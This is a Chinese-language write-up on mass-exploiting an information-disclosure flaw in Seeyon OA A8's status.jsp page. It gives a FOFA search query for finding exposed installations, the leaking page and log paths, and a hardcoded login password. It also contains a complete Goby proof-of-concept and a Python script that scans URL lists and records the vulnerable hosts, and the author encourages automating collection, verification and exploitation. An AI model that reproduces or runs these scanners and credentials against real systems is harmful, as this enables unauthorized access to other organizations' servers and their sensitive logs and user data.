前言部分
在本节中,我会分两部分来说明致远OA A8 status.jsp 信息泄露的验证问题,其实就是两种验证方式吧,都一样,都是批量验证,主要如下所示:
- 通过Python脚本进行批量验证,但是前提是你可以收集到所有
致远OA A8的地址(URL)。我一般使用两款工具进行收集。- FOFA:https://fofa.info/
- 鹰图:https://hunter.qianxin.com/
- 通过Goby进行批量验证。
啊,我个人感觉,其实这一部分可以做成自动化攻击的,当然我知道某些大厂内部已经有很多自动化攻击工具了,毕竟我始终是个小白,其实这一部分的自动化,无非就是:收集资产—验证漏洞—利用漏洞—形成报告。不管是用python,还是go,还是ruby,还是java,就是个时间问题吧。有时间、有兴趣的小伙伴可以钻研一下。
正文部分
简介
漏洞名称:致远OA A8 status.jsp 信息泄露
漏洞详情
在致远OA A8-m系统中,存在一个安全漏洞,该漏洞导致状态监控页面的信息保护不当。由于这一问题,潜在的攻击者能够访问并提取关键信息,如网站的具体路径和用户的登录名等敏感数据。这些信息的泄露可能为攻击者提供了进一步对系统进行攻击的机会。
漏洞复现
第一步、在FOFA中使用title="A8-m"查找资产。
第二步、判断是否存在对应页面:/seeyon/management/status.jsp
第三步、使用密码WLCCYBD@SEEYON登录。
复现结果:
通过下面的URL可以获得敏感信息:
/seeyon/management/status.jsp
/seeyon/logs/login.log
/seeyon/logs/v3x.log
批量验证
Goby 批量验证 POC
package exploits
import (
"git.gobies.org/goby/goscanner/goutils"
)
func init() {
expJson := `{
"Name": "致远OA A8 status.jsp 信息泄露",
"Description": "<p>利用该漏洞可读取致远OA A8 中的敏感信息,包括日志信息、服务器状态信息等。经验证存在的页面,使用WLCCYBD@SEEYON作为密码可以登录。<br></p>",
"Product": "致远OA",
"Homepage": "https://www.seeyon.com/",
"DisclosureDate": "2024-03-22",
"PostTime": "2024-03-22",
"Author": "",
"FofaQuery": "title=\"A8-m\"",
"GobyQuery": "title=\"A8-m\"",
"Level": "1",
"Impact": "",
"Recommendation": "",
"References": [],
"Is0day": false,
"HasExp": false,
"ExpParams": [
{
"name": "",
"type": "input",
"value": "",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/seeyon/management/index.jsp",
"follow_redirect": true,
"header": {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9",
"Cache-Control": "max-age=0",
"Connection": "keep-alive",
"Cookie": "JSESSIONID=5E2354B7A7C884BA110199C3A2B803A2",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.289 Mobile Safari/537.36"
},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "Management Monitor",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "Password",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": []
}
],
"Tags": [
"信息泄露"
],
"VulType": [
"信息泄露"
],
"CVEIDs": [
""
],
"CNNVD": [
""
],
"CNVD": [
""
],
"CVSSScore": "",
"Translation": {
"CN": {
"Name": "致远OA A8 status.jsp 信息泄露",
"Product": "致远OA",
"Description": "<p>利用该漏洞可读取致远OA A8 中的敏感信息,包括日志信息、服务器状态信息等。经验证存在的页面,使用WLCCYBD@SEEYON作为密码可以登录。<br></p>",
"Recommendation": "",
"Impact": "",
"VulType": [
"信息泄露"
],
"Tags": [
"信息泄露"
]
},
"EN": {
"Name": "致远OA A8 status.jsp 信息泄露",
"Product": "致远OA",
"Description": "<p>利用该漏洞可读取致远OA A8 中的敏感信息,包括日志信息、服务器状态信息等。经验证存在的页面,使用<span style=\"color: rgb(58, 55, 55); font-size: 16px;\">WLCCYBD@SEEYON作为密码可以登录。</span><br></p>",
"Recommendation": "",
"Impact": "",
"VulType": [
"Information Disclosure"
],
"Tags": [
"Information Disclosure"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`
ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
nil,
nil,
))
}
验证过程:
通过Goby的Fofa插件,批量导入。
然后直接选择POC进行验证。
验证结果:
Python 批量验证 POC
import requests
# 假设我们有一个包含URLs的文本文件 verify.txt
input_file_path = r'E:\UserData\Desktop\verify.txt'
output_file_path = r'E:\UserData\Desktop\result.txt'
# 用于存储符合条件的URLs
valid_urls = []
# 尝试读取输入文件并处理每个URL
try:
with open(input_file_path, 'r') as input_file:
for line in input_file:
url = line.strip() # 去除空白字符
# 检查URL是否有协议前缀,如果没有则添加http或https
if not url.lower().startswith(('http://', 'https://')):
url = 'http://' + url
# 构建完整的URL
full_url = f"{url}/seeyon/management/status.jsp"
# 发送请求
try:
response = requests.get(full_url, timeout=10) # 设置超时时间
# 检查响应状态码和内容
if response.status_code == 200:
if "Management Monitor" in response.text and "Password" in response.text:
valid_urls.append(full_url)
print(f"Valid URL found: {full_url}")
except requests.exceptions.RequestException as e:
print(f"Error accessing {full_url}: {e}")
# 将有效的URLs写入输出文件
with open(output_file_path, 'w') as output_file:
for url in valid_urls:
output_file.write(url + '\n')
print("Process completed. Valid URLs have been saved to result.txt.")
except FileNotFoundError:
print(f"The file {input_file_path} was not found.")
except IOError as e:
print(f"An I/O error occurred: {e}")
这个脚本会将存在预期结果的内容保存在一个result.txt中,没有做完善,感兴趣的话可以自己修改一下。
我测试发现结果没跑全,因为https 的问题吧?反正有 goby 在,我也懒得去鼓秋代码了。
